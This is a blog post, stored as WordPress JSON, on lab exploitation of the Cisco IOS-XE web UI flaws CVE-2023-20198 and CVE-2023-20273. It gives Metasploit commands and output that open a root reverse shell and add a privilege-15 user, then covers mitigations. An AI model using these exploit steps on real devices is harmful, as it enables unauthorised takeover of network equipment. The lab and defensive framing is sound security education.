{"id":1471,"date":"2024-01-18T21:23:57","date_gmt":"2024-01-18T13:23:57","guid":{"rendered":"https:\/\/www.insecurewi.re\/?p=1471"},"modified":"2024-01-18T21:39:00","modified_gmt":"2024-01-18T13:39:00","slug":"setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273","status":"publish","type":"post","link":"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/","title":{"rendered":"Setting up a Cisco IOS-XE Web UI Lab: CVE-2023-20198 and CVE-2023-20273"},"content":{"rendered":"\n<p>As reported by <a href=\"https:\/\/sec.cloudapps.cisco.com\/security\/center\/content\/CiscoSecurityAdvisory\/cisco-sa-iosxe-webui-privesc-j22SaA4z\">Cisco <\/a>back in mid-October 2023. Two vulnerabilities exist in IOS-XE that allow an unauthenticated user remote access to the system via the web user interface. These vulnerabilities gained a lot of attention as many devices have the http\/s server enabled and internet facing. Cisco have released patches for supported version of IOS-XE.<\/p>\n\n\n\n<p>OK so lets get to labbing this one!<br><strong>Disclaimer \u2013 never test on a production network. Always have permission. The following method is for a LAB environment only.<\/strong><\/p>\n\n\n\n<p><strong>Prerequisites:<\/strong><br>You will need a linux VM. I am using Kali 2024 weekly image on VMware Workstation host only IP 192.168.160.130\/24.<br>For this demo we are using GNS3 with the Cisco CSR1000v running IOS-XE 16.12.3 which is a vulnerable version to both CVE-2023-20198 and CVE-2023-20273. The router has an interface Gi1 connected to GNS3 external network object. Gi1 interface ip is 192.168.160.129\/24. The http\/s servers are enabled:<code>HQ#sh run | sec ip http<br>ip http server<br>ip http authentication local<br>ip http secure-server<br>ip http client source-interface GigabitEthernet1<\/code><\/p>\n\n\n\n<p><strong>Method 1:<\/strong><br>We are going to use two exploits with Metasploit 6. The first one is the <a href=\"https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/misc\/cisco_ios_xe_rce\/\">IOS-XE RCE<\/a> and allows you to check if the device is vulnerable.<br>Fire up Kali, setup the network (which is out of scope of this blog post) and set the exploit up like so:<br><code>msf6 &gt; use exploit\/linux\/misc\/cisco_ios_xe_rce<br>set lhost 192.168.160.130<br>set rhosts 192.168.160.129<br>set rport 443<\/code><br>This module allows you to run the check against the target:<code>msf6 exploit(linux\/misc\/cisco_ios_xe_rce) &gt; check<br>[+] 192.168.160.129:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03<\/code><br>As we setup the options previous to the check (and the check confirmed target was vulnerable) you can simply run the exploit command:<br><code>msf6 exploit(linux\/misc\/cisco_ios_xe_rce) &gt; exploit<br>[<em>] Started reverse TCP handler on 192.168.160.130:4444 [<\/em>] Running automatic check (\"set AutoCheck false\" to disable)<br>[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03<br>[<em>] Created privilege 15 user 'WeDWFyqX' with password 'zhKjyLGq' [<\/em>] Removing user 'WeDWFyqX'<br>[<em>] Sending stage (3045380 bytes) to 192.168.160.129 [<\/em>] Meterpreter session 1 opened (192.168.160.130:4444 -&gt; 192.168.160.129:59626) at 2024-01-18 20:53:32 +0800<br><br>meterpreter &gt; getuid<br>Server username: root<br>meterpreter &gt; sysinfo<br>Computer : HQ<br>OS : (Linux 4.19.64)<br>Architecture : x64<br>BuildTuple : x86_64-linux-musl<br>Meterpreter : x64\/linux<br>meterpreter &gt; exit<br>[*] Shutting down session<\/code><\/p>\n\n\n\n<p>Success! Ok so that makes use of the first module for these two vulnerabilities. It creates the user and password then binds a reverse shell with meterpreter. It also removes the user as part of this process. You can see above we are root and the CSR1000v device running IOS-XE is called &#8220;HQ&#8221;.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"2262\" height=\"515\" src=\"https:\/\/www.insecurewi.re\/wp-content\/themes\/breek\/assets\/images\/transparent.gif\" data-lazy=\"true\" data-src=\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-6.png\" alt=\"CVE-2023-20273\" class=\"wp-image-1475\" data-srcset=\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-6.png 2262w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-6-300x68.png 300w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-6-1024x233.png 1024w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-6-768x175.png 768w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-6-1536x350.png 1536w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-6-2048x466.png 2048w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-6-100x23.png 100w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-6-700x159.png 700w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-6-1600x364.png 1600w\" data-sizes=\"auto, (max-width: 2262px) 100vw, 2262px\" \/><\/figure>\n\n\n\n<p><strong>Method 2:<\/strong><br>Open a new Metasploit tab or terminal window and lets run the other <a href=\"https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/admin\/http\/cisco_ios_xe_cli_exec_cve_2023_20198\/\">exploit<\/a>.<br>This one allows you to run cli commands on the vulnerable IOS-XE instance.<br><code>msf6 &gt; use auxiliary\/admin\/http\/cisco_ios_xe_cli_exec_cve_2023_20198<br>msf6 auxiliary(admin\/http\/cisco_ios_xe_cli_exec_cve_2023_20198) &gt; set mode global<br>mode =&gt; global<br>msf6 auxiliary(admin\/http\/cisco_ios_xe_cli_exec_cve_2023_20198) &gt; set rhosts 192.168.160.129<br>rhosts =&gt; 192.168.160.129<br>msf6 auxiliary(admin\/http\/cisco_ios_xe_cli_exec_cve_2023_20198) &gt; set cmd username tester privilege 15 password test<br>cmd =&gt; username tester privilege 15 password test<br>msf6 auxiliary(admin\/http\/cisco_ios_xe_cli_exec_cve_2023_20198) &gt; run<br>[<em>] Running module against 192.168.160.129 WARNING: Command has been added to the configuration using a type 0 password. However, type 0 passwords will soon be deprecated. Migrate to a supported password type [<\/em>] Auxiliary module execution completed<\/code><\/p>\n\n\n\n<p>So what happened here? We set the mode to global (Cisco Global Configuration mode), configured the target rhost 192.168.160.129 and set the command to add the user tester with password test and privilege level 15 (the highest on a Cisco device). Lets check the CSR1000v and see if it actually worked:<br><code>HQ#show run | s username<br>username tester privilege 15 password 7 071B245F5A<\/code><\/p>\n\n\n\n<p>The console also output that a type 7 password was used when the exploit was run (at the same time) so we know it worked. The console also reported the web daemon made the change:<code>HQ# *Jan 18 13:10:39.025: %AAAA-4-CLI_DEPRECATED: WARNING: Command has been added to the configuration using a type 0 password. However, type 0 passwords will soon be deprecated. Migrate to a supported password type<br>*Jan 18 13:10:39.027: %SYS-5-CONFIG_P: Configured programmatically by <strong>process SEP_webui_wsma_http<\/strong> from console as vty0 on vty0<\/code><\/p>\n\n\n\n<p><strong>Mitigation:<\/strong><br>It&#8217;s 2024 now. There is really no reason to have any web server on a network appliance directly connected to the Internet. So apart from the common sense and bleeding obvious we do the following:<br>Disable ip http and ip https web server on the Cisco device:<br><code>HQ#conf t<br>Enter configuration commands, one per line. End with CNTL\/Z.<br>HQ(config)#no ip http server<br>HQ(config)#no ip http secure-server<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"2259\" height=\"501\" src=\"https:\/\/www.insecurewi.re\/wp-content\/themes\/breek\/assets\/images\/transparent.gif\" data-lazy=\"true\" data-src=\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-7.png\" alt=\"CVE-2023-20198\" class=\"wp-image-1473\" data-srcset=\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-7.png 2259w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-7-300x67.png 300w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-7-1024x227.png 1024w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-7-768x170.png 768w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-7-1536x341.png 1536w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-7-2048x454.png 2048w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-7-100x22.png 100w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-7-700x155.png 700w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/image-7-1600x355.png 1600w\" data-sizes=\"auto, (max-width: 2259px) 100vw, 2259px\" \/><\/figure>\n\n\n\n<p>You can also set an ip access list if you must have the web server enabled like so:<br><code>ip http access-class 75<br>ip http secure-server<br>!<br>access-list 75 permit 192.168.0.0 0.0.0.255<br>access-list 75 deny any<\/code><br><br>The other option is to patch. When this first came to light there was a gap between the vendor announcing the bugs and the patches being available. Cisco have released a detailed table with the products and patch availability <a href=\"https:\/\/www.cisco.com\/c\/en\/us\/support\/docs\/ios-nx-os-software\/ios-xe-dublin-17121\/221128-software-fix-availability-for-cisco-ios.html\">here<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>As reported by Cisco back in mid-October 2023. Two vulnerabilities exist in IOS-XE that allow an unauthenticated user remote access to the system via the&#8230;<\/p>\n","protected":false},"author":1,"featured_media":1481,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,24,10],"tags":[67,226,227],"class_list":["post-1471","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-attack","category-cisco","category-security","tag-cisco","tag-cve-2023-20198","tag-cve-2023-20273"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Setting up a Cisco IOS-XE Web UI Lab: CVE-2023-20198 and CVE-2023-20273 - Insecure Wire<\/title>\n<meta name=\"description\" content=\"In this post, I detail how to configure a metasploit lab for CVE-2023-20198 and CVE-2023-20273 Cisco IOS-XE vulnerabilities.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Setting up a Cisco IOS-XE Web UI Lab: CVE-2023-20198 and CVE-2023-20273 - Insecure Wire\" \/>\n<meta property=\"og:description\" content=\"In this post, I detail how to configure a metasploit lab for CVE-2023-20198 and CVE-2023-20273 Cisco IOS-XE vulnerabilities.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/\" \/>\n<meta property=\"og:site_name\" content=\"Insecure Wire\" \/>\n<meta property=\"article:published_time\" content=\"2024-01-18T13:23:57+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-01-18T13:39:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/cisco-data-switch-800x513-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"513\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"nikonau\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@insecurewire\" \/>\n<meta name=\"twitter:site\" content=\"@insecurewire\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"nikonau\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/\"},\"author\":{\"name\":\"nikonau\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/5ac8f791cae796f3f916df63c5b629be\"},\"headline\":\"Setting up a Cisco IOS-XE Web UI Lab: CVE-2023-20198 and CVE-2023-20273\",\"datePublished\":\"2024-01-18T13:23:57+00:00\",\"dateModified\":\"2024-01-18T13:39:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/\"},\"wordCount\":517,\"commentCount\":1,\"publisher\":{\"@id\":\"https:\/\/www.insecurewi.re\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/cisco-data-switch-800x513-1.jpg\",\"keywords\":[\"Cisco\",\"CVE-2023-20198\",\"CVE-2023-20273\"],\"articleSection\":[\"Attack\",\"Cisco\",\"Security\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/\",\"url\":\"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/\",\"name\":\"Setting up a Cisco IOS-XE Web UI Lab: CVE-2023-20198 and CVE-2023-20273 - Insecure Wire\",\"isPartOf\":{\"@id\":\"https:\/\/www.insecurewi.re\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/cisco-data-switch-800x513-1.jpg\",\"datePublished\":\"2024-01-18T13:23:57+00:00\",\"dateModified\":\"2024-01-18T13:39:00+00:00\",\"description\":\"In this post, I detail how to configure a metasploit lab for CVE-2023-20198 and CVE-2023-20273 Cisco IOS-XE vulnerabilities.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/#primaryimage\",\"url\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/cisco-data-switch-800x513-1.jpg\",\"contentUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/cisco-data-switch-800x513-1.jpg\",\"width\":800,\"height\":513,\"caption\":\"Cisco Data Switch\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.insecurewi.re\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Setting up a Cisco IOS-XE Web UI Lab: CVE-2023-20198 and CVE-2023-20273\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.insecurewi.re\/#website\",\"url\":\"https:\/\/www.insecurewi.re\/\",\"name\":\"Insecure Wire\",\"description\":\"A Network Engineer\u2019s Perspective.\",\"publisher\":{\"@id\":\"https:\/\/www.insecurewi.re\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.insecurewi.re\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.insecurewi.re\/#organization\",\"name\":\"Insecure Wire\",\"url\":\"https:\/\/www.insecurewi.re\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png\",\"contentUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png\",\"width\":32,\"height\":32,\"caption\":\"Insecure Wire\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/insecurewire\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/5ac8f791cae796f3f916df63c5b629be\",\"name\":\"nikonau\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/028a7d3c6ce829ba17d770711837dfbac95470619924117ee2ac82993ad83990?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/028a7d3c6ce829ba17d770711837dfbac95470619924117ee2ac82993ad83990?s=96&d=mm&r=g\",\"caption\":\"nikonau\"},\"sameAs\":[\"https:\/\/www.insecurewi.re\"],\"url\":\"https:\/\/www.insecurewi.re\/index.php\/author\/nikonxillioncomputers-com\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Setting up a Cisco IOS-XE Web UI Lab: CVE-2023-20198 and CVE-2023-20273 - Insecure Wire","description":"In this post, I detail how to configure a metasploit lab for CVE-2023-20198 and CVE-2023-20273 Cisco IOS-XE vulnerabilities.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/","og_locale":"en_US","og_type":"article","og_title":"Setting up a Cisco IOS-XE Web UI Lab: CVE-2023-20198 and CVE-2023-20273 - Insecure Wire","og_description":"In this post, I detail how to configure a metasploit lab for CVE-2023-20198 and CVE-2023-20273 Cisco IOS-XE vulnerabilities.","og_url":"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/","og_site_name":"Insecure Wire","article_published_time":"2024-01-18T13:23:57+00:00","article_modified_time":"2024-01-18T13:39:00+00:00","og_image":[{"width":800,"height":513,"url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/cisco-data-switch-800x513-1.jpg","type":"image\/jpeg"}],"author":"nikonau","twitter_card":"summary_large_image","twitter_creator":"@insecurewire","twitter_site":"@insecurewire","twitter_misc":{"Written by":"nikonau","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/#article","isPartOf":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/"},"author":{"name":"nikonau","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/5ac8f791cae796f3f916df63c5b629be"},"headline":"Setting up a Cisco IOS-XE Web UI Lab: CVE-2023-20198 and CVE-2023-20273","datePublished":"2024-01-18T13:23:57+00:00","dateModified":"2024-01-18T13:39:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/"},"wordCount":517,"commentCount":1,"publisher":{"@id":"https:\/\/www.insecurewi.re\/#organization"},"image":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/#primaryimage"},"thumbnailUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/cisco-data-switch-800x513-1.jpg","keywords":["Cisco","CVE-2023-20198","CVE-2023-20273"],"articleSection":["Attack","Cisco","Security"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/","url":"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/","name":"Setting up a Cisco IOS-XE Web UI Lab: CVE-2023-20198 and CVE-2023-20273 - Insecure Wire","isPartOf":{"@id":"https:\/\/www.insecurewi.re\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/#primaryimage"},"image":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/#primaryimage"},"thumbnailUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/cisco-data-switch-800x513-1.jpg","datePublished":"2024-01-18T13:23:57+00:00","dateModified":"2024-01-18T13:39:00+00:00","description":"In this post, I detail how to configure a metasploit lab for CVE-2023-20198 and CVE-2023-20273 Cisco IOS-XE vulnerabilities.","breadcrumb":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/#primaryimage","url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/cisco-data-switch-800x513-1.jpg","contentUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2024\/01\/cisco-data-switch-800x513-1.jpg","width":800,"height":513,"caption":"Cisco Data Switch"},{"@type":"BreadcrumbList","@id":"https:\/\/www.insecurewi.re\/index.php\/2024\/01\/18\/setting-up-a-cisco-ios-xe-web-ui-lab-cve-2023-20198-and-cve-2023-20273\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.insecurewi.re\/"},{"@type":"ListItem","position":2,"name":"Setting up a Cisco IOS-XE Web UI Lab: CVE-2023-20198 and CVE-2023-20273"}]},{"@type":"WebSite","@id":"https:\/\/www.insecurewi.re\/#website","url":"https:\/\/www.insecurewi.re\/","name":"Insecure Wire","description":"A Network Engineer\u2019s Perspective.","publisher":{"@id":"https:\/\/www.insecurewi.re\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.insecurewi.re\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.insecurewi.re\/#organization","name":"Insecure Wire","url":"https:\/\/www.insecurewi.re\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/","url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png","contentUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png","width":32,"height":32,"caption":"Insecure Wire"},"image":{"@id":"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/insecurewire"]},{"@type":"Person","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/5ac8f791cae796f3f916df63c5b629be","name":"nikonau","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/028a7d3c6ce829ba17d770711837dfbac95470619924117ee2ac82993ad83990?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/028a7d3c6ce829ba17d770711837dfbac95470619924117ee2ac82993ad83990?s=96&d=mm&r=g","caption":"nikonau"},"sameAs":["https:\/\/www.insecurewi.re"],"url":"https:\/\/www.insecurewi.re\/index.php\/author\/nikonxillioncomputers-com\/"}]}},"_links":{"self":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/1471","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/comments?post=1471"}],"version-history":[{"count":8,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/1471\/revisions"}],"predecessor-version":[{"id":1484,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/1471\/revisions\/1484"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/media\/1481"}],"wp:attachment":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/media?parent=1471"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/categories?post=1471"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/tags?post=1471"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}